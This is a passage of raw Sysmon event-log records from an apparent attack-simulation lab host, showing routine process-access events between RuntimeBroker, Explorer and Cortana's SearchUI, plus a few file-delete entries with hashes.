ystem32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011010Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:52.454{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000011009Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:52.454{266CAFBE-64C4-6064-9B00-00000000AE01}49245412C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011008Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:52.454{266CAFBE-64C4-6064-9B00-00000000AE01}49246040C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000011007Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:52.454{266CAFBE-64C4-6064-9B00-00000000AE01}49245412C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000011006Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:52.454{266CAFBE-64C4-6064-9B00-00000000AE01}49246092C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+26297|C:\Windows\system32\windows.cortana.Desktop.dll+214fb|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011005Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:52.454{266CAFBE-64C4-6064-9B00-00000000AE01}49246092C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+21491|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 23542300x800000000000000011004Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:52.407{266CAFBE-64D4-6064-B700-00000000AE01}5704ATTACKRANGE\AdministratorC:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\25VDZ31Z\microsoft.windows[1].xmlMD5=E9792A78BAD8F9B19189F84CE4154DBF,SHA256=EF8E690550D15948653537360444AE845DEE1FC718F783D4BD63DC473E3655E8,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000011003Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:52.376{266CAFBE-64C4-6064-9B00-00000000AE01}49245412C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011002Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:52.376{266CAFBE-64C4-6064-9B00-00000000AE01}49245412C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000011001Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:52.376{266CAFBE-64C4-6064-9B00-00000000AE01}49246092C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011000Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:52.376{266CAFBE-64C4-6064-9B00-00000000AE01}49246040C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000010999Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:52.376{266CAFBE-64C4-6064-9B00-00000000AE01}49246040C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000010998Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:52.376{266CAFBE-64C4-6064-9B00-00000000AE01}49246092C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000010997Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:52.376{266CAFBE-64C4-6064-9B00-00000000AE01}49246040C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+26297|C:\Windows\system32\windows.cortana.Desktop.dll+214fb|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000010996Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:52.376{266CAFBE-64C4-6064-9B00-00000000AE01}49246040C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+21491|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 23542300x800000000000000010995Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:52.376{266CAFBE-64D4-6064-B700-00000000AE01}5704ATTACKRANGE\AdministratorC:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\25VDZ31Z\microsoft.windows[1].xmlMD5=D9DEC0CB99A429DE9DFF76407267FADC,SHA256=4D7D2D8CBBCD944E297D27E68794B1FB3E72184EF8F84A1146EFCF4AC1313704,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000010994Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:52.376{266CAFBE-64C4-6064-9B00-00000000AE01}49246040C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000010993Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:52.376{266CAFBE-64C4-6064-9B00-00000000AE01}49246040C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 23542300x800000000000000010992Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:52.220{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EFD751191CABDD3407CF5B0DE78A2D58,SHA256=3E7D6295A9B80EF67E3CC1EF9EADF450C477768190B178E474653AB7FE1326BB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000011089Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:53.923{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba300|C:\Windows\System32\TwinUI.dll+ba677|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x800000000000000011088Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:53.923{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba300|C:\Windows\System32\TwinUI.dll+ba677|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x800000000000000011087Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
